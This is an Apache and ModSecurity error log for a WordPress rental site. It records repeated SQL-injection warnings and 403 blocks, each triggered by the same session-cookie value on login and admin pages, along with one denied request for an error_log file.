[Mon May 11 18:28:46.561494 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDvjJnyuKVXoStDhbg0QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:46.561777 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDvjJnyuKVXoStDhbg0QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:47.394262 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDvjJnyuKVXoStDhbg0QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:47.517499 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDvzJnyuKVXoStDhbg0gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:47.517868 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDvzJnyuKVXoStDhbg0gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:48.089517 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDvzJnyuKVXoStDhbg0gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:48.255684 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDwDJnyuKVXoStDhbg0wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:48.255975 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDwDJnyuKVXoStDhbg0wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:48.779972 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDwDJnyuKVXoStDhbg0wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:49.040668 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIDwTJnyuKVXoStDhbg1gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:49.040993 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIDwTJnyuKVXoStDhbg1gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:49.722123 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDwTJnyuKVXoStDhbg1gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:50.097429 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIDwjJnyuKVXoStDhbg1wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:50.097721 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIDwjJnyuKVXoStDhbg1wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:51.188413 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDwjJnyuKVXoStDhbg1wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:51.481105 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIDwzJnyuKVXoStDhbg2QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:51.481415 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIDwzJnyuKVXoStDhbg2QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:52.485395 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDwzJnyuKVXoStDhbg2QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:52.809543 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDxDJnyuKVXoStDhbg2wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:52.809829 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDxDJnyuKVXoStDhbg2wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:54.095979 2026] [authz_core:error] [pid 1416109:tid 1416148] [client 47.128.126.114:15892] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/endpoints/error_log
[Mon May 11 18:28:55.526613 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDxDJnyuKVXoStDhbg2wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:55.634244 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDxzJnyuKVXoStDhbg6AAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:55.634535 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDxzJnyuKVXoStDhbg6AAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:56.789484 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDxzJnyuKVXoStDhbg6AAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:56.925462 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDyDJnyuKVXoStDhbg6QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:56.925743 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDyDJnyuKVXoStDhbg6QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:57.585557 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDyDJnyuKVXoStDhbg6QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:57.850376 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIDyTJnyuKVXoStDhbg6wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:57.850663 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIDyTJnyuKVXoStDhbg6wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:58.738818 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDyTJnyuKVXoStDhbg6wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:59.551216 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIDyzJnyuKVXoStDhbg7QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:28:59.551511 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIDyzJnyuKVXoStDhbg7QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:00.478178 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDyzJnyuKVXoStDhbg7QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:00.724570 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIDzDJnyuKVXoStDhbg7wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:00.724867 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIDzDJnyuKVXoStDhbg7wAAAEE"], referer: https://rentparadise.fr/wp-login.php
